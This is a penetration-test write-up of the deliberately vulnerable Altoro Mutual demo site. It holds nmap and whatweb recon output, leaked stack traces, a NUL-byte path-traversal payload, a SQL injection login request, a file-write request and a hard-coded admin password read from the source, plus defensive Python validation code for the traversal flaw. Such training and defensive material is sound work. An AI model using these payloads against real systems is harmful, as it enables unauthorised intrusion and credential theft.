demo.testfire.net
Information gathering
Domain
IP and port information

```
65.61.137.117
```
nmap information

```
root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A 65.61.137.117
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT
Nmap scan report for 65.61.137.117
Host is up (0.60s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE      VERSION
80/tcp   open     http         Microsoft IIS httpd 8.0
| http-cookie-flags:
|   /:
|     amSessionId:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.0
|_http-title: Altoro Mutual
443/tcp  open     ssl/http     Microsoft IIS httpd 8.0
| http-cookie-flags:
|   /:
|     amSessionId:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.0
|_http-title: Altoro Mutual
| ssl-cert: Subject: commonName=demo.testfire.net
| Not valid before: 2014-07-01T09:54:37
|_Not valid after:  2019-12-22T09:54:37
|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.
445/tcp  filtered microsoft-ds
514/tcp  filtered shell
4444/tcp filtered krb524
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   5.10 ms  192.168.245.2
2   26.32 ms 65.61.137.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds
```
Middleware

```
root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/
http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]
```
Summary
- Windows server, ASP.NET (aspx), IIS 8
- This is a deliberately vulnerable target site, so domain, CDN and similar information need not be collected
Vulnerability discovery
Error message leaks the physical path
A GET request to http://demo.testfire.net/comment.aspx returns:

```
An Error Has Occurred
Summary:
Value cannot be null.

Error Message:
System.ArgumentNullException: Value cannot be null. Parameter name: input
   at System.Text.RegularExpressions.Regex.IsMatch(String input)
   at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern)
   at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31
   at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27
   at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
   at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
   at System.Web.UI.Control.OnLoad(EventArgs e)
   at System.Web.UI.Control.LoadRecursive()
   at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
```
Suspected application path

```
c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31
```
No captcha on the login form (brute force may be possible)

```
http://www.altoromutual.com/bank/login.aspx
```
Arbitrary file read
View the source of login.aspx

```
http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt
```
Supplying a non-existent file name reveals directory information

```
Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'
System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.
File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'
   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
   at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
   at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
   at System.IO.StreamReader..ctor(String path)
   at System.IO.File.OpenText(String path)
   at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42
   at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70
   at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
   at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
   at System.Web.UI.Control.OnLoad(EventArgs e)
   at System.Web.UI.Control.LoadRecursive()
   at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
```
Reading the source of /admin/login.aspx gives the administrator password

```csharp
if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")
```
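The stack trace above shows `Altoro.Default.LoadFile(myFile)` handing the `content=` value straight to `File.OpenText`, which is why `../bank/login.aspx.cs%00.txt` works: the NUL byte makes the native open stop before the `.txt` suffix. As an added example that is not code from the Altoro Mutual demo, the Python below mirrors the same loader with the checks it is missing; the content-root layout and the `.txt`-only rule are assumptions.

```python
import os
from urllib.parse import unquote

CONTENT_ROOT = os.path.abspath("./website/content")  # assumed layout, not the demo's real path


class UnsafeContentPath(ValueError):
    """Raised for any content= value that must not reach the filesystem."""


def content_param_from_query(raw: str) -> str:
    # The application sees the decoded value: "%00" arrives as a real NUL byte.
    return unquote(raw)


def resolve_content_path(param: str, root: str = CONTENT_ROOT) -> str:
    root = os.path.abspath(root)
    # 1. A NUL byte never belongs in a file name. Native file APIs stop at the
    #    NUL, so "x.cs\x00.txt" satisfies a ".txt" suffix check yet opens x.cs.
    if "\x00" in param:
        raise UnsafeContentPath("NUL byte in content parameter")
    # 2. Accept a bare file name only: with no separators, neither ../ nor ..\
    #    traversal can be expressed, whatever the OS would do with them.
    if "/" in param or "\\" in param or param in ("", ".", ".."):
        raise UnsafeContentPath("directory component in content parameter")
    # 3. Allow-list the extension on the value as received, not on anything
    #    the server appends afterwards.
    if not param.lower().endswith(".txt"):
        raise UnsafeContentPath("only .txt content may be served")
    # 4. Canonicalise and confirm containment anyway (defence in depth).
    full = os.path.abspath(os.path.join(root, param))
    if os.path.commonpath([full, root]) != root:
        raise UnsafeContentPath("resolved path escapes the content root")
    return full


def is_safe_content_param(param: str, root: str = CONTENT_ROOT) -> bool:
    """Boolean view of resolve_content_path, handy for logging rejected requests."""
    try:
        resolve_content_path(param, root)
        return True
    except UnsafeContentPath:
        return False


def load_content(param: str, root: str = CONTENT_ROOT) -> str:
    # Only a validated, canonical path ever reaches open().
    with open(resolve_content_path(param, root), encoding="utf-8") as fh:
        return fh.read()
```

A rejected value should be logged with the raw parameter, since a `%00` or `../` in `content=` is itself a useful detection signal.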
SQL injection

```http
POST /bank/login.aspx HTTP/1.1
Host: demo.testfire.net
Content-Length: 45
Cache-Control: max-age=0
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://demo.testfire.net/bank/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288
Connection: close

uid=hac425%27&passw=%27%27%27&btnSubmit=Login
```
File write
It seems only .txt files can be written; a written .aspx file cannot be accessed

```http
POST /comment.aspx HTTP/1.1
Host: www.altoromutual.com
Content-Length: 111
Cache-Control: max-age=0
Origin: http://www.altoromutual.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.altoromutual.com/feedback.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004
Connection: close

cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+
```